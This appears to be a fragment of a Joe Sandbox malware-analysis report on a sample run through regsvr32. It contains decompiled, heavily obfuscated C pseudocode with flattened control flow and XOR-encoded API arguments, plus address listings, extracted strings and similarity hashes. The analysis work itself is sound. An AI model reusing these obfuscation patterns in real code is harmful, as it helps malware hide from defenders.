					__eflags = _t1283 - 0x7a5d2;
					if(_t1283 == 0x7a5d2) {
						_v156 = 0x1e58a8;
						_v156 = _v156 + 0xffffb4d9;
						_v156 = _v156 << 0xd;
						_t1192 = 0x2c;
						_v156 = _v156 / _t1192;
						_v156 = _v156 ^ 0x046c5d6e;
						_v164 = 0x1cfb18;
						_v164 = _v164 * 0xa;
						_v164 = _v164 + 0xad35;
						_v164 = _v164 + 0xb5fa;
						_t1007 =  &_v164;
						 *_t1007 = _v164 ^ 0x01204fc6;
						__eflags =  *_t1007;
						_t1011 = E003CF88D(_t1192, _v156 % _t1192);
						goto L116;
					}
					__eflags = _t1283 - 0x8166a;
					if(_t1283 == 0x8166a) {
						_v160 = 0x66c73;
						_v160 = _v160 ^ 0x980e1f6c;
						_v160 = _v160 ^ 0x980f5ec5;
						_t1011 = E003DAFB1();
						_t1283 = 0x5d714;
						while(1) {
							L1:
							_t1169 = 0x1c;
							goto L2;
						}
					}
					__eflags = _t1283 - 0x81a9f;
					if(_t1283 == 0x81a9f) {
						_v164 = 0x71fefb;
						_v164 = _v164 * 0x47;
						_v164 = _v164 + 0xffff68bc;
						_v164 = _v164 + 0x3525;
						_v164 = _v164 ^ 0x1f999348;
						_v160 = 0xa12d9c;
						_v160 = _v160 + 0xffffb541;
						_v160 = _v160 ^ 0x00a5503e;
						E003D9CA1();
						_v160 = 0xcf95b9;
						_t1167 = 0x2b090;
						_t1193 = 0x25;
						_push(_t1193);
						_v160 = _v160 * 0x1f;
						_v160 = _v160 ^ 0x1929482e;
						_v164 = 0xf19819;
						_v164 = _v164 >> 7;
						_v164 = _v164 | 0x7d42c293;
						_t1144 = _v164;
						_t1256 = _t1144 % _t1193;
						_v164 = _t1144 / _t1193;
						_v164 = _v164 ^ 0x03616ca6;
						_v152 = 0x9c07af;
						_v152 = _v152 >> 5;
						_v152 = _v152 + 0xd596;
						_v152 = _v152 >> 2;
						_v152 = _v152 ^ 0x00014a64;
						_v156 = 0xf28b47;
						_v156 = _v156 + 0x5fa2;
						_v156 = _v156 + 0xffffbbb2;
						_v156 = _v156 + 0xffff3b95;
						_t578 =  &_v156;
						 *_t578 = _v156 ^ 0x00f1ac10;
						__eflags =  *_t578;
						_t1011 = E003C2B6C(_v152, _v156);
						_t1280 = _t1011;
						goto L69;
					}
					__eflags = _t1283 - 0x990a9;
					if(_t1283 != 0x990a9) {
						goto L112;
					}
					_v164 = 0x31bbd0;
					_t1148 = _v164;
					_t1197 = 0x47;
					_t1256 = _t1148 % _t1197;
					_v164 = _t1148 / _t1197;
					_v164 = _v164 ^ 0x7f4ee9ff;
					_v164 = _v164 ^ 0x7f4162e2;
					_t1011 = E003C3A63();
					_t1283 = 0x8166a;
				}
			}

0x003dc5eb
0x003dc5f2
0x003dc5f7
0x003dc605
0x003dc60d
0x003dc613
0x003dc617
0x003dc61f
0x003dc627
0x003dc627
0x003dc629
0x003dc62a
0x003dc62a
0x003dc62a
0x003dc630
0x00000000
0x00000000
0x003dc636
0x003dd09e
0x003dd0a6
0x003dd0ab
0x003dd0b7
0x003dd0bc
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dc63c
0x003dc642
0x003dc9c2
0x003dc9c8
0x003dcd66
0x003dcd6c
0x003dce5e
0x003dce68
0x003dce70
0x003dce75
0x003dce7d
0x003dce8b
0x003dce97
0x003dce9b
0x003dcea3
0x003dcea8
0x003dceb0
0x003dceb4
0x003dcebd
0x003dcec5
0x003dced7
0x003dcedb
0x003dcee3
0x003dceeb
0x003dcef8
0x003dcefc
0x003dcf04
0x003dcf0c
0x003dcf10
0x003dcf19
0x003dcf1f
0x003dcf27
0x003dcf33
0x003dcf38
0x003dcf3a
0x003dcf47
0x003dcf4f
0x003dcf57
0x003dcf5f
0x003dcf67
0x003dcf7d
0x003dcf82
0x003dcf8e
0x003dcf90
0x003dcf98
0x003dcfa6
0x003dcfb5
0x003dcfbb
0x003dcfbc
0x003dcfc0
0x003dcfc8
0x003dcfd0
0x003dcfd8
0x003dcfe0
0x003dcfeb
0x003dcfef
0x003dd007
0x003dd00c
0x003dd01d
0x003dd020
0x003dd02c
0x003dd030
0x003dd035
0x003dd03d
0x003dd049
0x003dd04e
0x003dd054
0x003dd05c
0x003dd064
0x003dd069
0x003dd072
0x003dd075
0x003dd079
0x003dd091
0x003dd096
0x003ddaa9
0x003ddaa9
0x003ddaaf
0x003ddb7b
0x003ddb82
0x003ddb82
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dcd72
0x003dcd78
0x003dce54
0x00000000
0x003dce54
0x003dcd7e
0x003dcd84
0x003dcdf0
0x003dcdfa
0x003dcdff
0x003dce07
0x003dce0f
0x003dce17
0x003dce1d
0x003dce1e
0x003dce20
0x003dce24
0x003dce29
0x003dce2e
0x003dce3e
0x003dce43
0x003dce4a
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dcd86
0x003dcd8c
0x00000000
0x00000000
0x003dcd92
0x003dcd9a
0x003dcd9f
0x003dcda7
0x003dcdaf
0x003dcdb7
0x003dcdbf
0x003dcdc4
0x003dcdc9
0x003dcdd1
0x003dcde1
0x003dcde6
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dc9ce
0x003dcc1f
0x003dcc27
0x003dcc30
0x003dcc34
0x003dcc39
0x003dcc41
0x003dcc49
0x003dcc51
0x003dcc56
0x003dcc5e
0x003dcc6b
0x003dcc73
0x003dcc84
0x003dcc88
0x003dcc8d
0x003dcc90
0x003dcc92
0x003dcd3c
0x003dcd40
0x003dcd43
0x003dcd4f
0x003dcd51
0x003dcd5c
0x003dcd5c
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dcd53
0x003dcd56
0x003dc9b8
0x003dc9b8
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x00000000
0x003dcd56
0x003dcd45
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dcc98
0x003dcca0
0x003dcca5
0x003dccad
0x003dccb5
0x003dccba
0x003dccc2
0x003dccca
0x003dccd2
0x003dccda
0x003dcce2
0x003dccea
0x003dccf2
0x003dccfa
0x003dcd07
0x003dcd08
0x003dcd0c
0x003dcd14
0x003dcd2c
0x003dcd33
0x003dcd35
0x00000000
0x003dcd35
0x003dc9d4
0x003dc9da
0x003dcbd5
0x003dcbdd
0x003dcbe2
0x003dcbe7
0x003dcbef
0x003dcbfc
0x003dcc00
0x003dcc10
0x003dcc15
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dc9e0
0x003dc9e6
0x003dcb33
0x003dcb3b
0x003dcb43
0x003dcb4b
0x003dcb53
0x003dcb58
0x003dcb60
0x003dcb65
0x003dcb6d
0x003dcb7a
0x003dcb7e
0x003dcb8b
0x003dcb8f
0x003dcb97
0x003dcb9f
0x003dcba7
0x003dcbaf
0x003dcbbb
0x003dcbc3
0x003dcbc8
0x003dcbcb
0x003dcbd0
0x003dcbd0
0x003dc9ec
0x003dc9f2
0x003dca36
0x003dca38
0x003dcb2c
0x003dcb2c
0x00000000
0x003dcb2c
0x003dca3e
0x003dca46
0x003dca4b
0x003dca57
0x003dca5c
0x003dca64
0x003dca66
0x003dca6a
0x003dca72
0x003dca77
0x003dca7f
0x003dca87
0x003dca8f
0x003dca97
0x003dcaa5
0x003dcaa9
0x003dcab9
0x003dcac0
0x003dcac4
0x003dcad0
0x003dcada
0x003dcadf
0x003dcae4
0x003dcaec
0x003dcaf4
0x003dcafc
0x003dcb08
0x003dcb09
0x003dcb0d
0x003dcb11
0x003dcb13
0x003dcb17
0x003dcb17
0x003dcb17
0x003dcb27
0x00000000
0x003dcb27
0x003dcac6
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dc9f4
0x003dc9fa
0x00000000
0x00000000
0x003dca00
0x003dca0a
0x003dca0e
0x003dca12
0x003dca13
0x003dca15
0x003dca19
0x003dca1e
0x003dca26
0x003dca2a
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dc648
0x003dc94d
0x003dc95d
0x003dc962
0x003dc968
0x003dc974
0x003dc977
0x003dc97b
0x003dc987
0x003dc98c
0x003dc98e
0x003dc990
0x003dc998
0x003dc99d
0x003dc9a2
0x003dc9a7
0x003dc9a7
0x003dc9a7
0x003dc9b3
0x003dc9b3
0x00000000
0x003dc98e
0x003dc64e
0x003dc654
0x003dc79c
0x003dc7a2
0x003dc8ea
0x003dc8fb
0x003dc8fc
0x003dc900
0x003dc904
0x003dc906
0x003dc90a
0x003dc90e
0x003dc916
0x003dc91e
0x003dc926
0x003dc936
0x003dc93b
0x003dc93d
0x00000000
0x00000000
0x003dc943
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dc7a8
0x003dc7ae
0x003dc83a
0x003dc842
0x003dc847
0x003dc84f
0x003dc860
0x003dc869
0x003dc871
0x003dc879
0x003dc881
0x003dc889
0x003dc891
0x003dc899
0x003dc8a1
0x003dc8a9
0x003dc8b1
0x003dc8b9
0x003dc8be
0x003dc8ce
0x003dc8d2
0x003dc8d9
0x003dc8e0
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dc7b4
0x003dc7ba
0x003dc802
0x003dc80a
0x003dc80f
0x003dc817
0x003dc81f
0x003dc82b
0x003dc830
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dc7bc
0x003dc7c2
0x00000000
0x00000000
0x003dc7c8
0x003dc7d2
0x003dc7e0
0x003dc7e3
0x003dc7e7
0x003dc7ec
0x003dc7f8
0x00000000
0x003dc7f8
0x003dc65a
0x003dc774
0x003dc77c
0x003dc781
0x003dc78d
0x003dc792
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dc666
0x003ddaba
0x003ddac2
0x003ddaca
0x003ddad2
0x003ddada
0x003ddae2
0x003ddaea
0x003ddaf7
0x003ddaf8
0x003ddafc
0x003ddb10
0x00000000
0x003ddb16
0x003dc672
0x003dc714
0x003dc71e
0x003dc726
0x003dc72e
0x003dc736
0x003dc73a
0x003dc73c
0x003dc740
0x003dc748
0x003dc758
0x003dc761
0x003dc769
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dc67e
0x003dc6e1
0x003dc6e9
0x003dc6f1
0x003dc6fd
0x003dc702
0x003dc704
0x00000000
0x00000000
0x003dc70a
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dc686
0x00000000
0x003dc68c
0x003dc68c
0x003dc696
0x003dc69e
0x003dc6a6
0x003dc6ae
0x003dc6b4
0x003dc6b5
0x003dc6b7
0x003dc6bb
0x003dc6cb
0x003dc6d0
0x003dc6d7
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dc686
0x003dd0c6
0x003dd0cc
0x003dd6b2
0x003dd6b8
0x003dd89f
0x003dd8a5
0x003dda09
0x003dda11
0x003dda19
0x003dda21
0x003dda2d
0x003dda32
0x003dda34
0x003dda70
0x003dda78
0x003dda7d
0x003dda85
0x003dda91
0x003dda96
0x003dda98
0x003ddaa4
0x00000000
0x003ddaa4
0x003dda9a
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dda36
0x003dda3e
0x003dda46
0x003dda4e
0x003dda5a
0x003dda63
0x003dda65
0x003dd4ce
0x003dd4ce
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dd8ab
0x003dd8b1
0x003dd9ce
0x003dd9d6
0x003dd9e3
0x003dd9e7
0x003dd9f3
0x003dd9f8
0x003dd9ff
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dd8b7
0x003dd8bd
0x00000000
0x00000000
0x003dd8c3
0x003dd8d0
0x003dd8d4
0x003dd8dc
0x003dd8e4
0x003dd8f0
0x003dd8f5
0x003dd8ff
0x003dd90c
0x003dd90f
0x003dd913
0x003dd91b
0x003dd923
0x003dd92b
0x003dd933
0x003dd93b
0x003dd943
0x003dd94b
0x003dd958
0x003dd960
0x003dd968
0x003dd970
0x003dd978
0x003dd97d
0x003dd985
0x003dd98d
0x003dd9a5
0x003dd9af
0x003dd9b4
0x003dd9bb
0x003dd9c3
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dd6be
0x003dd862
0x003dd86f
0x003dd878
0x003dd87c
0x003dd888
0x003dd88d
0x003dd88f
0x00000000
0x00000000
0x003dd895
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dd6c4
0x003dd6ca
0x003dd7e6
0x003dd7f0
0x003dd7f8
0x003dd7fd
0x003dd805
0x003dd80d
0x003dd81c
0x003dd81d
0x003dd827
0x003dd82b
0x003dd833
0x003dd844
0x003dd84e
0x003dd857
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dd6d0
0x003dd6d6
0x003dd790
0x003dd798
0x003dd79d
0x003dd7a5
0x003dd7ad
0x003dd7b5
0x003dd7ba
0x003dd7bf
0x003dd7cf
0x003dd7d4
0x003dd7d6
0x00000000
0x00000000
0x003dd7dc
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dd6dc
0x003dd6e2
0x003dd73c
0x003dd749
0x003dd74d
0x003dd755
0x003dd75d
0x003dd761
0x003dd769
0x003dd779
0x003dd77e
0x003dd780
0x00000000
0x00000000
0x003dd786
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dd6e4
0x003dd6ea
0x00000000
0x00000000
0x003dd6f0
0x003dd6f8
0x003dd700
0x003dd708
0x003dd710
0x003dd718
0x003dd71d
0x003dd72d
0x003dd732
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dd0d2
0x003dd4d9
0x003dd4e5
0x003dd4ed
0x003dd4f2
0x003dd4fa
0x003dd502
0x003dd507
0x003dd50c
0x003dd511
0x003dd519
0x003dd521
0x003dd526
0x003dd52e
0x003dd533
0x003dd543
0x003dd547
0x003dd54e
0x003dd550
0x003dd559
0x003dd55d
0x003dd55f
0x003dd565
0x003dd56f
0x003dd574
0x003dd57c
0x003dd584
0x003dd58c
0x003dd591
0x003dd597
0x003dd598
0x003dd59a
0x003dd59b
0x003dd59f
0x003dd5a7
0x003dd5af
0x003dd5b7
0x003dd5bc
0x003dd5c4
0x003dd5cc
0x003dd5d4
0x003dd5d4
0x003dd5d4
0x003dd5f2
0x003dd5f4
0x003dd5f8
0x003dd5f9
0x003dd5fc
0x003dd602
0x003dd60c
0x003dd614
0x003dd61c
0x003dd624
0x003dd62c
0x003dd634
0x003dd63c
0x003dd644
0x003dd64c
0x003dd651
0x003dd657
0x003dd658
0x003dd65a
0x003dd65b
0x003dd65f
0x003dd667
0x003dd66f
0x003dd679
0x003dd67d
0x003dd685
0x003dd685
0x003dd685
0x003dd69d
0x003dd6a4
0x003dd6a4
0x003dd552
0x003dd552
0x003dd552
0x003dd6a6
0x003dd6a8
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dd0d8
0x003dd0de
0x003dd32d
0x003dd333
0x003dd4a4
0x003dd4ac
0x003dd4b1
0x003dd4bd
0x003dd4c6
0x003dd4c8
0x003dd4c8
0x00000000
0x003dd4c8
0x003dd339
0x003dd33f
0x003dd462
0x003dd46c
0x003dd470
0x003dd477
0x003dd478
0x003dd47a
0x003dd47e
0x003dd48b
0x003dd48f
0x003dd497
0x003dd49b
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dd345
0x003dd347
0x003dd400
0x003dd40c
0x003dd414
0x003dd41c
0x003dd421
0x003dd429
0x003dd431
0x003dd439
0x003dd441
0x003dd449
0x003dd452
0x003dd458
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dd34d
0x003dd353
0x00000000
0x00000000
0x003dd359
0x003dd363
0x003dd36b
0x003dd370
0x003dd378
0x003dd380
0x003dd388
0x003dd388
0x003dd38e
0x003dd38f
0x003dd391
0x003dd395
0x003dd3a2
0x003dd3a6
0x003dd3b6
0x003dd3bb
0x003dd3c3
0x003dd3c8
0x003dd3d0
0x003dd3d8
0x003dd3e4
0x003dd3ed
0x003dd3f5
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dd0e4
0x003dd281
0x003dd291
0x003dd294
0x003dd298
0x003dd2a0
0x003dd2a8
0x003dd2b0
0x003dd2b8
0x003dd2bd
0x003dd2c1
0x003dd2c6
0x003dd2ca
0x003dd2d2
0x003dd2da
0x003dd2e2
0x003dd2e7
0x003dd2ef
0x003dd2f7
0x003dd2ff
0x003dd304
0x003dd318
0x003dd320
0x003dd325
0x003dd24c
0x003dd24c
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dd0ea
0x003dd0f0
0x003ddb19
0x003ddb23
0x003ddb2b
0x003ddb36
0x003ddb39
0x003ddb3d
0x003ddb45
0x003ddb52
0x003ddb56
0x003ddb5e
0x003ddb66
0x003ddb66
0x003ddb66
0x003ddb76
0x00000000
0x003ddb76
0x003dd0f6
0x003dd0fc
0x003dd256
0x003dd25e
0x003dd266
0x003dd272
0x003dd277
0x003dc627
0x003dc627
0x003dc629
0x00000000
0x003dc629
0x003dc627
0x003dd102
0x003dd108
0x003dd150
0x003dd15d
0x003dd161
0x003dd169
0x003dd171
0x003dd179
0x003dd181
0x003dd189
0x003dd199
0x003dd19e
0x003dd1ad
0x003dd1b4
0x003dd1b5
0x003dd1b6
0x003dd1ba
0x003dd1c2
0x003dd1ca
0x003dd1cf
0x003dd1d7
0x003dd1db
0x003dd1dd
0x003dd1e1
0x003dd1e9
0x003dd1f1
0x003dd1f6
0x003dd1fe
0x003dd203
0x003dd20b
0x003dd213
0x003dd21b
0x003dd223
0x003dd22b
0x003dd22b
0x003dd22b
0x003dd243
0x003dd24a
0x00000000
0x003dd24a
0x003dd10a
0x003dd110
0x00000000
0x00000000
0x003dd116
0x003dd120
0x003dd126
0x003dd127
0x003dd129
0x003dd12d
0x003dd135
0x003dd141
0x003dd146
0x003dd146

Strings

Dh, xrefs: 003DD0BC
gG, xrefs: 003DC605
=,, xrefs: 003DD91B
Dh, xrefs: 003DD6D0
jn, xrefs: 003DC6C7
tjn, xrefs: 003DC6C3
8|W, xrefs: 003DD05C
tjn, xrefs: 003DD1D7, 003DD771, 003DD821, 003DD9DE, 003DD651, 003DD86A, 003DD725, 003DD953, 003DD674, 003DD26E, 003DD873, 003DD4B9, 003DC6AE, 003DD30C, 003DD995, 003DD9EF, 003DD191, 003DD7CB, 003DD695, 003DD1A8, 003DD815, 003DD233
\g, xrefs: 003DD923
,P, xrefs: 003DD2E7
i48, xrefs: 003DCF82

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ,P$8|W$=,$Dh$Dh$\g$gG$i48$jn$tjn$tjn
API String ID: 0-3405114153
Opcode ID: 9fa0c15e2c1c742c9d95003491341a421b9258e3e7ed476fa867978698be5930
Instruction ID: 6b6e16fe5c6964723db4c55ea44a47490d5fee7cb41d81b5b3362f1ab3b8e425
Opcode Fuzzy Hash: 9fa0c15e2c1c742c9d95003491341a421b9258e3e7ed476fa867978698be5930
Instruction Fuzzy Hash: B1B224729083428BC359DF24E54A40BBBE1BBD4748F115D2EF4A5AA260C7B4DA4DCF93

Uniqueness

Uniqueness Score: -1.00%

Function 003C62BA Relevance: 14.4, Strings: 11, Instructions: 631
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E003C62BA(void* __ecx, void* __edx) {
				char _v524;
				char _v1044;
				char _v1564;
				char _v2084;
				char _v2604;
				signed int _v2608;
				signed int _v2612;
				intOrPtr _v2616;
				intOrPtr _v2620;
				intOrPtr _v2624;
				char _v2628;
				intOrPtr _v2632;
				char _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				void* _t674;
				void* _t675;
				void* _t679;
				void* _t696;
				signed int _t711;
				signed int _t725;
				void* _t754;
				signed int _t756;
				signed int _t759;
				signed int _t761;
				signed int _t762;
				signed int _t767;
				signed int _t768;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t779;
				signed int _t782;
				signed int _t783;
				signed int _t792;
				signed int _t793;
				signed int _t854;
				signed int _t859;
				signed int _t860;
				void* _t861;
				void* _t862;
				void* _t868;

				_v2612 = _v2612 & 0x00000000;
				_v2608 = _v2608 & 0x00000000;
				_v2616 = 0x9f3ed;
				_v2644 = 0x23b92;
				_v2644 = _v2644 | 0x4ac28a71;
				_v2644 = _v2644 + 0xffff3a95;
				_v2644 = _v2644 * 0x59;
				_t861 = __ecx;
				_v2644 = _v2644 ^ 0xfd65de1a;
				_t854 = 0x5c13b;
				_t674 = E003C3100();
				_t853 = _v2656;
				_t754 = _t674;
				while(1) {
					L1:
					_t675 = 0xafd1f;
					while(1) {
						L2:
						_t756 = 0x5d;
						do {
							L3:
							_t868 = _t854 - 0x9b4b6;
							if(_t868 > 0) {
								__eflags = _t854 - 0xa9aa1;
								if(_t854 == 0xa9aa1) {
									_v2660 = 0xffe086;
									_push(_t756);
									_v2660 = _v2660 * 0x6c;
									_v2660 = _v2660 + 0x18f2;
									_v2660 = _v2660 ^ 0x6bf428be;
									_v2648 = 0xcb5e9d;
									_v2648 = _v2648 + 0xffffe672;
									_v2648 = _v2648 ^ 0x00c2901a;
									_v2656 = 0x67de59;
									_v2656 = _v2656 << 6;
									_v2656 = _v2656 ^ 0x19f3880b;
									_v2664 = 0x545c45;
									_v2664 = _v2664 + 0xffff9b19;
									_v2664 = _v2664 >> 0xf;
									_v2664 = _v2664 ^ 0x00dc8c53;
									_t639 =  &_v2664;
									 *_t639 = _v2664 ^ 0x00d6b755;
									__eflags =  *_t639;
									E003D8BA1(_v2660, _v2648,  *_t639, 1, 0, _v2656,  &_v524, 0, _v2664);
									_t862 = _t862 + 0x1c;
									_t854 = 0x9b4b6;
									_t675 = 0xafd1f;
									_t756 = 0x5d;
									goto L25;
								} else {
									__eflags = _t854 - _t675;
									if(_t854 == _t675) {
										_v2664 = 0x5c8cab;
										_v2664 = _v2664 + 0x6b68;
										_v2664 = _v2664 ^ 0x0055656a;
										_v2640 = 0x386a;
										_v2640 = _v2640 + 0x94a0;
										_v2640 = _v2640 ^ 0x0008acde;
										_v2648 = 0xc0850f;
										_v2648 = _v2648 + 0x9936;
										_v2648 = _v2648 ^ 0x00c15216;
										_v2656 = 0x911d8c;
										_v2656 = _v2656 << 4;
										_v2656 = _v2656 ^ 0x091fc90a;
										_t679 = E003CD933(_v2664, _v2640, 0x3c11b8, _v2648, _v2656);
										_v2652 = 0x8e0b53;
										_v2652 = _v2652 ^ 0x766d0717;
										_v2652 = _v2652 ^ 0xe8a9718f;
										_v2652 = _v2652 ^ 0x9e42f7fb;
										_v2656 = 0x495f15;
										_v2656 = _v2656 + 0xffff04c6;
										_v2656 = _v2656 ^ 0x004e1a83;
										_v2660 = 0x1e9921;
										_v2660 = _v2660 + 0xef62;
										_v2660 = _v2660 + 0xffffda13;
										_v2660 = _v2660 ^ 0x00157742;
										_v2664 = 0xc693ff;
										_t759 = 7;
										_v2664 = _v2664 / _t759;
										_v2664 = _v2664 << 3;
										_v2664 = _v2664 ^ 0x00e5d4b3;
										E003C2388(_v2652,  &_v524, _v2656, _v2660, _t679,  &_v1044, _v2664, _t853,  &_v2604);
										_v2660 = 0x71ec8b;
										_v2660 = _v2660 ^ 0x27e8ba6a;
										_v2660 = _v2660 + 0xffffaca0;
										_v2660 = _v2660 + 0xffff6a95;
										_v2660 = _v2660 ^ 0x279bba6a;
										_v2656 = 0x6a21d2;
										_v2656 = _v2656 + 0xffff89ad;
										_v2656 = _v2656 ^ 0x0064eb54;
										_v2664 = 0x4980e0;
										_v2664 = _v2664 + 0x9f2b;
										_v2664 = _v2664 + 0xffffd6b5;
										_v2664 = _v2664 * 0x35;
										_v2664 = _v2664 ^ 0x0f597417;
										E003C43D3(_v2660, _v2656, _v2664, _t679);
										_t862 = _t862 + 0x34;
										_t854 = 0xa9aa1;
										goto L1;
									} else {
										__eflags = _t854 - 0xd2d38;
										if(_t854 == 0xd2d38) {
											_v2656 = 0xa59cb7;
											_v2656 = _v2656 >> 3;
											_v2656 = _v2656 ^ 0x001aa531;
											_v2664 = 0x91ccd5;
											_v2664 = _v2664 + 0xffffdbe1;
											_v2664 = _v2664 | 0x8fbfb657;
											_v2664 = _v2664 ^ 0x8fb54da0;
											_v2660 = 0x622cdc;
											_v2660 = _v2660 ^ 0x854dc3f2;
											_v2660 = _v2660 + 0xffffc443;
											_v2660 = _v2660 ^ 0x852ddbff;
											E003C2493(_t756,  &_v2084, _v2656, _v2664, _v2660);
											_v2660 = 0xc9cb50;
											_v2660 = _v2660 ^ 0xae1d00c5;
											_t761 = 0x5d;
											_v2660 = _v2660 / _t761;
											_v2660 = _v2660 ^ 0x01ef95fa;
											_v2664 = 0xa7482e;
											_t762 = 0x3d;
											_v2664 = _v2664 / _t762;
											_v2664 = _v2664 + 0xffffaebb;
											_v2664 = _v2664 + 0xffffc1b0;
											_v2664 = _v2664 ^ 0x0007af4e;
											_v2656 = 0x47654a;
											_v2656 = _v2656 >> 0xc;
											_v2656 = _v2656 ^ 0x0006710b;
											 *((short*)(E003D7C07( &_v2084, _v2660, _v2664, _v2656))) = 0;
											_v2664 = 0x58a287;
											_v2664 = _v2664 << 5;
											_v2664 = _v2664 | 0x1eea48e8;
											_v2664 = _v2664 ^ 0xc20d067a;
											_v2664 = _v2664 ^ 0xddf01f99;
											_v2648 = 0x210dab;
											_v2648 = _v2648 | 0x8f51ecd2;
											_v2648 = _v2648 ^ 0x8f783684;
											_v2656 = 0x87c1ac;
											_v2656 = _v2656 + 0xffffb30b;
											_v2656 = _v2656 ^ 0x0083ed32;
											E003C4E03( &_v1564, _v2664, __eflags, _v2648, _v2656);
											_v2660 = 0xf1c535;
											_v2660 = _v2660 >> 3;
											_v2660 = _v2660 ^ 0xe73c5065;
											_t396 =  &_v2660; // 0xe73c5065
											_v2660 =  *_t396 * 0x2e;
											_v2660 = _v2660 ^ 0x882743e0;
											_v2664 = 0xe166fd;
											_v2664 = _v2664 + 0xffff697a;
											_v2664 = _v2664 + 0xffffd8b1;
											_v2664 = _v2664 ^ 0xd7732407;
											_v2664 = _v2664 ^ 0xd7951a7a;
											_v2652 = 0xebb5fa;
											_v2652 = _v2652 ^ 0x5b6a1a68;
											_v2652 = _v2652 ^ 0xf8376314;
											_v2652 = _v2652 ^ 0xa3bd5e5a;
											_v2656 = 0x1f1622;
											_v2656 = _v2656 >> 6;
											_v2656 = _v2656 ^ 0x000d72b9;
											_t696 = E003CD933(_v2660, _v2664, 0x3c1108, _v2652, _v2656);
											_v2648 = 0xee043f;
											_t767 = 5;
											_v2648 = _v2648 / _t767;
											_v2648 = _v2648 ^ 0x00267fca;
											_v2660 = 0xcbbdb8;
											_v2660 = _v2660 << 3;
											_v2660 = _v2660 >> 0xa;
											_t768 = 0x21;
											_v2660 = _v2660 / _t768;
											_v2660 = _v2660 ^ 0x00033c5c;
											_v2664 = 0xfe18d5;
											_v2664 = _v2664 + 0xb00e;
											_v2664 = _v2664 << 0xe;
											_v2664 = _v2664 + 0xffff84c8;
											_v2664 = _v2664 ^ 0xb2359aa5;
											_v2656 = 0x554633;
											_v2656 = _v2656 << 0xd;
											_v2656 = _v2656 ^ 0xa8c8cebb;
											E003D0E90( &_v2084, __eflags, _t768, _v2660, _v2664,  &_v1564,  &_v2604, _v2656, _t696);
											_v2660 = 0x8ad9c9;
											_v2660 = _v2660 << 0x10;
											_v2660 = _v2660 << 8;
											_v2660 = _v2660 + 0x94ce;
											_v2660 = _v2660 ^ 0xc90f11d9;
											_v2652 = 0xb4f2c6;
											_v2652 = _v2652 | 0x56513ae2;
											_t480 =  &_v2652; // 0x56513ae2
											_t770 = 0x1e;
											_v2652 =  *_t480 / _t770;
											_v2652 = _v2652 ^ 0x02eadb2e;
											_v2664 = 0x50caa4;
											_t771 = 0x6f;
											_v2664 = _v2664 / _t771;
											_t772 = 0x5c;
											_v2664 = _v2664 / _t772;
											_v2664 = _v2664 >> 0xf;
											_v2664 = _v2664 ^ 0x0008e3f1;
											_t507 =  &_v2660; // 0x56513ae2
											E003C43D3( *_t507, _v2652, _v2664, _t696);
											_v2660 = 0xce10be;
											_v2660 = _v2660 << 0xe;
											_v2660 = _v2660 + 0xffff2150;
											_v2660 = _v2660 ^ 0x8428f093;
											_v2664 = 0x389b20;
											_v2664 = _v2664 | 0x6d644005;
											_v2664 = _v2664 + 0xffff740e;
											_v2664 = _v2664 + 0x7292;
											_v2664 = _v2664 ^ 0x6d7d1c17;
											_t711 = E003C89F6( &_v2604, _t861, _v2664);
